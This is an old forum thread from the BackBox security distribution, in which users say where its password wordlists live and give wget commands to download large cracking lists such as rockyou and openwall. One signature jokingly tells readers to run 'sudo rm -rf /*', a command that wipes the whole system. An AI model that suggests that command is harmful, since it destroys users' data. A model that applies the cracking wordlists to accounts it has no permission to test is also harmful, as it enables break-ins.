Is there a dictionary in backbox?

Started by aroldgre, July 24, 2012, 04:01:09 AM

Previous topic - Next topic

aroldgre

Hello,
I was looking for a dictionary in Backbox, but I could not locate one. Can someone please tell me if there is a dictionary in Backbox?



Thank you very much,
aroldgre

raffaele

/usr/share/dict
/opt/msf/data/wordlists/

...
raffaele@backbox:~$ Get root or die tryin'

DFkT

user@backbox:/sudo cd /usr/share/dict
user@backbox:/usr/share/dict$ wget http://download.openwall.net/pub/wordlists/all.gz
user@backbox:/usr/share/dict$ wget http://downloads.skullsecurity.org/passwords/rockyou.txt.bz2
user@backbox:/usr/share/dict$ wget http://downloads.skullsecurity.org/passwords/500-worst-passwords.txt.bz2
user@backbox:/usr/share/dict$ wget http://downloads.skullsecurity.org/passwords/twitter-banned.txt.bz2
user@backbox:/usr/share/dict$ wget http://downloads.skullsecurity.org/passwords/english.txt.bz2
user@backbox:/usr/share/dict$ bunzip2 *.bz2
user@backbox:/usr/share/dict$ gunzip all.gz

done.

ZEROF

Hi DFkT,

Good solutions. Thank you for sharing. But i propose you to check torrent sites for full openwall password list too.

Cheers !

Don't ask, read : http://wiki.backbox.org
or just run sudo rm -rf /*